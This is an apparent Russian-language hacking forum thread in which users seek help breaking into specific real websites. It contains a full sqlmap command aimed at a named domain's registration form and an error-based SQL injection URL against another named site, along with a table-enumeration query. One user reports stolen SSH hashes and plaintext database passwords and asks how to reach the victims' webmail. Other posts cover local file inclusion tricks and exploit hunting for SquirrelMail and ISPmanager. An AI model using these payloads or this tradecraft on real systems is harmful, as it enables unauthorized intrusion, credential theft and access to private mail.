Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Хорошо,уже что-то... А какой из параметров? first_name? у меня ручками не получается... (';+UNION+SELECT+error-based & etc). А вообще я запускал софтину с ключем --parse-errors. А это значит,что он должен был мне показать саму ошибку,так? Или нужно было включить траффик-лог?
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вообще то в работе пишут какой параметр injectable.

    Почитал твой последний лог - у тебя там вообще не описан URL.

    Отсюда вывод, что либо он имеет вид url/?param=123 или url/param/123 и SQLMap автоматом атакует последний и единственный параметр.
     
    _________________________
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    После уязвимого параметра нужно (*) поставить, чтобы обозначить точку атаки.
     
  4. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    http://sub.adomain.ru/users/register/ т.е. он долбит по "register"... Нежиданно.... Мне казалось,что изначально он прогоняет data-параметры
    (те,что постом идут)
     
  5. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ " --data="first_name=aaa&last_name=aaa&email=[email protected]&password_1=asdasd&password_2=asdasd&country=none&city=ffff&phone_number=%2B894613216516&traffic_source_types[]=interesting&traffic_desc=ddddd&spec=register&_q=1" -f --random-agent --banner --parse-errors --all --risk=3 --level=5 --batch --dump-format=HTML --output-dir='/var/www/../' -t '/var/www/../traff.txt' > '/var/www/../log.txt'
    В общем,если есть возможность и желание,то прошу помощи,т.к. сам не смог разобраться
    log: http://rghost.ru/private/6LHmtr2tj/45ef36d7704be9bf4bc49b6bd2f9c241
    traff: http://rghost.ru/private/8tx2bwB6Y/a1446f5dad951f089afa935d0ea42365
    Пробовал сделать поиск по файлу траффика(т.к. БД была определена Oracle=> ошибки искал,как ORA-*) результата нет. Да и вообще там нет ошибок,как мне кажется
     
    #24085 xxl, 12 Apr 2015
    Last edited: 12 Apr 2015
  6. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?
    EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only:( FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря :D? ну таааааааааааааак обидно, сил нет
     
    #24086 vikler, 16 Apr 2015
    Last edited: 16 Apr 2015
  7. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...
    + ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
     
    #24087 xxl, 17 Apr 2015
    Last edited: 17 Apr 2015
  8. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
  9. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД.
    (
    это если ручками хочешь перебирать,а так:
    sqlmap сказал,что
    [WARNING] no table(s) found.
    Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')
    )
     
    #24089 xxl, 19 Apr 2015
    Last edited: 19 Apr 2015
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
    #24090 kingbeef, 19 Apr 2015
    Last edited: 19 Apr 2015
  11. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  13. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо, понял
     
  14. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
     
  15. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
  17. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Пробовал читать /proc/self/environ но там вроде как инклуд патх везде не дает лазить далее файлов на самом сайте.
    Нулл байт пробовал.
    Слешдотов должно быть именно 4096? Какой предел?
     
  18. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
  19. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Сделал. Просто мне казалось,что есть какое-то универсальное решение в случаях,когда мап так ругается.
     
  20. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
Thread Status:
Not open for further replies.